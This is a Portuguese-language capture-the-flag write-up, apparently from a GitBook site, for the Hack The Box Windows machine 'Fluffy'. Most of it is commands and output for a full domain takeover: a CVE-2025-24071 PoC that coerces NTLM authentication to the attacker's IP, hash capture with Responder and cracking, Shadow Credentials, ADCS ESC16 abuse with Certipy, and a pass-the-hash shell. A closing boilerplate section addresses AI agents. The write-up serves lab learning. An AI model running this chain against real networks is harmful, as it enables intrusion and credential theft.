> For the complete documentation index, see [llms.txt](https://jpg.gitbook.io/jpg/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jpg.gitbook.io/jpg/writeups/hack-the-box/active-directory/fluffy.md).
# Fluffy
Fluffy é uma máquina Windows de dificuldade fácil, projetada para simular um cenário de Assumed Breach, no qual são fornecidas credenciais de um usuário com privilégios baixos. Ao explorar a vulnerabilidade CVE-2025-24071, é possível obter as credenciais de outro usuário com privilégios limitados. Uma análise mais detalhada revela a existência de ACLs (Listas de Controle de Acesso) sobre as contas winrm\_svc e ca\_svc. O WinRM pode então ser usado para fazer login no alvo utilizando a conta winrc\_svc. A exploração de uma vulnerabilidade no serviço de ADCS (ESC16) usando a conta ca\_svc é necessária para obter acesso à conta de Administrador.
***
### Enumeração Inicial
Por se tratar de um cenário Assumed Breach, iniciaremos a máquina com as seguintes credenciais:
```jsx
j.fleischman / J0elTHEM4n1990!
```
Para enumerar o host e gerar um arquivo de hosts, usamos:
```bash
Fluffy » nxc smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --generate-hosts-file hosts
SMB 10.129.232.88 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.232.88 445 DC01 [+] fluffy.htb\\j.fleischman:J0elTHEM4n1990!
Fluffy » cat hosts
10.129.232.88 DC01.fluffy.htb fluffy.htb DC01
Fluffy » cat hosts | sudo tee -a /etc/hosts
```
> If you are in a lab with no dns resolution you can use option `--generate-hosts-file` to generate a host file for you and avoid DNS problem when using LDAP or Kerberos protocols.
#### Shares
Olhando as shares, encontramos uma chamada “IT” que o nosso usuário possui permissão de leitura e escrita.
```bash
Fluffy » nxc smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.232.88 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.232.88 445 DC01 [+] fluffy.htb\\j.fleischman:J0elTHEM4n1990!
SMB 10.129.232.88 445 DC01 [*] Enumerated shares
SMB 10.129.232.88 445 DC01 Share Permissions Remark
SMB 10.129.232.88 445 DC01 ----- ----------- ------
SMB 10.129.232.88 445 DC01 ADMIN$ Remote Admin
SMB 10.129.232.88 445 DC01 C$ Default share
SMB 10.129.232.88 445 DC01 IPC$ READ Remote IPC
SMB 10.129.232.88 445 DC01 IT READ,WRITE
SMB 10.129.232.88 445 DC01 NETLOGON READ Logon server share
SMB 10.129.232.88 445 DC01 SYSVOL READ Logon server share
```
Dentro dela, encontramos arquivos de instalações juntamente com o documento `Upgrade_Notice.pdf`.
```bash
Fluffy » smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@dc01.fluffy.htb -dc-ip 10.129.232.88
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use IT
# ls
drw-rw-rw- 0 Wed Feb 4 04:30:33 2026 .
drw-rw-rw- 0 Wed Feb 4 04:30:33 2026 ..
drw-rw-rw- 0 Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 11:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 11:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 11:31:07 2025 Upgrade_Notice.pdf
# get Upgrade_Notice.pdf
```
***
### CVE-2025-24071
O documento baixado anteriormente contém referências a diversas vulnerabilidades recentes. Uma delas se encaixa no nosso cenário:
> Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
>
```bash
Fluffy/CVE-2025-24071_PoC (main) » python3 PoC.py jpg.zip 10.10.16.99
[+] File jpg.zip.library-ms created successfully.
```
O arquivo gerado pela PoC, junto com o **Responder**, permite capturar a hash do usuário `P.Agila`.
```bash
Fluffy » smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@dc01.fluffy.htb -dc-ip 10.129.232.88
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use IT
# ls
drw-rw-rw- 0 Wed Feb 4 04:30:33 2026 .
drw-rw-rw- 0 Wed Feb 4 04:30:33 2026 ..
drw-rw-rw- 0 Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 11:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 11:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 11:31:07 2025 Upgrade_Notice.pdf
# !ls
exploit.zip
lextab.py
PoC.py
README.md
usecase.gif
# put exploit.zip
```
#### Capturando Hash
```bash
Responder (master) » sudo python3 Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:39263493d725839c:29AEA93EFDE6B9716D39951518E37CEB:010100000000000080C869625995DC011B3F0DDF4F453BB700000000020008004B00510054004D0001001E00570049004E002D0045005300540053004A0053003800420052003800520004003400570049004E002D0045005300540053004A005300380042005200380052002E004B00510054004D002E004C004F00430041004C00030014004B00510054004D002E004C004F00430041004C00050014004B00510054004D002E004C004F00430041004C000700080080C869625995DC0106000400020000000800300030000000000000000100000000200000489098651F23FEB7D1DD7D252945097ECC0AD15052FB486AB0F30673D80CDC440A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00390039000000000000000000
```
Utilizando o Hashcat podemos identificar e quebrar a hash.
```bash
Fluffy » hashcat --identify hash
The following hash-mode match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
5600 | NetNTLMv2 | Network Protocol
```
```bash
P.AGILA::FLUFFY:39263493d725839c:29aea93efde6b9716d39951518e37ceb:010100000000000080c869625995dc011b3f0ddf4f453bb700000000020008004b00510054004d0001001e00570049004e002d0045005300540053004a0053003800420052003800520004003400570049004e002d0045005300540053004a005300380042005200380052002e004b00510054004d002e004c004f00430041004c00030014004b00510054004d002e004c004f00430041004c00050014004b00510054004d002e004c004f00430041004c000700080080c869625995dc0106000400020000000800300030000000000000000100000000200000489098651f23feb7d1dd7d252945097ecc0ad15052fb486ab0f30673d80cdc440a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00390039000000000000000000:prometheusx-303
```
```bash
Fluffy » nxc smb 10.129.232.88 -u 'p.agila' -p 'prometheusx-303' jpg@offsec
SMB 10.129.232.88 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.232.88 445 DC01 [+] fluffy.htb\\p.agila:prometheusx-303
```
***
### Mapeando Permissões com BloodHound
Nosso novo usuário faz parte do grupo Service Account Managers, que possui permissão GenericAll sobre o grupo Service Accounts. Esse grupo possui GenericWrite sobre três contas de serviço.
Devido ao GenericAll, podemos adicionar nós mesmos ao grupo `Service Accounts`.
```bash
Fluffy » bloodyAD.py --host DC01.FLUFFY.HTB -d FLUFFY.HTB --dc-ip 10.129.232.88 -u p.agila -p 'prometheusx-303' add groupMember "Service Accounts" p.agila
[+] p.agila added to Service Accounts
```
Uma vez que estamos no grupo, temos controle sobre as contas de serviço, permitindo ataque de `Shadow Credentials` e posteriormente `Pass-the-Hash`.
>
>
```bash
Fluffy » bloodyAD.py --host DC01.FLUFFY.HTB -d FLUFFY.HTB --dc-ip 10.129.232.88 -u p.agila -p 'prometheusx-303' add shadowCredentials ca_svc
[+] KeyCredential generated with following sha256 of RSA key: 4c87049379391a78da4c3520a7ea355700b97a3ea56baa40416e96a0b4243da0
[+] TGT stored in ccache file ca_svc_ks.ccache
NT: ca0f4f9e9eb8a092addf53bb03fc98c8
```
Com a conta de CA, podemos enumerar os certificados em busca de possíveis formas de Privesc.
### Privilege Escalation
#### Certipy
```bash
Fluffy » certipy find -vulnerable -u ca_svc -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.232.88 -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\\Administrators
Access Rights
ManageCa : FLUFFY.HTB\\Domain Admins
FLUFFY.HTB\\Enterprise Admins
FLUFFY.HTB\\Administrators
ManageCertificates : FLUFFY.HTB\\Domain Admins
FLUFFY.HTB\\Enterprise Admins
FLUFFY.HTB\\Administrators
Enroll : FLUFFY.HTB\\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
```
A wiki do Certipy é incrivelmente boa para ataques envolvendo certificados, e iremos utilizá-la para explorar o **ESC16**.
> [https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally)
O ataque consiste em:
* **Atualizar o UPN da vítima para o `sAMAccountName` do Administrador.**
```bash
Fluffy » certipy account \\ jpg@offsec
-u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' \\
-dc-ip '10.129.232.88' -user 'ca_svc' -upn "Administrator" \\
update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : Administrator
[*] Successfully updated 'ca_svc'
```
* **Soliciar um certificado como a “vítima” em algum template de autenticação no CA vulnerável a ESC-16**
```bash
Fluffy » certipy req -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -template 'User' -ca 'fluffy-DC01-CA' -dc-host dc01.fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```
* **Reverter o UPN da vítima.**
```bash
Fluffy » certipy account \
-u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' \
-dc-ip '10.129.232.88' -user 'ca_svc' -upn "ca_svc" \
update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
```
* **Autenticar como Administrator.**
```bash
Fluffy » certipy auth -dc-ip 10.129.232.88 -pfx administrator.pfx -username administrator -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```
```bash
Fluffy » evil-winrm -i 10.129.232.88 -u Administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> type ../Desktop/root.txt
b9a7c9737e905da42a6a************
```
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://jpg.gitbook.io/jpg/writeups/hack-the-box/active-directory/fluffy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.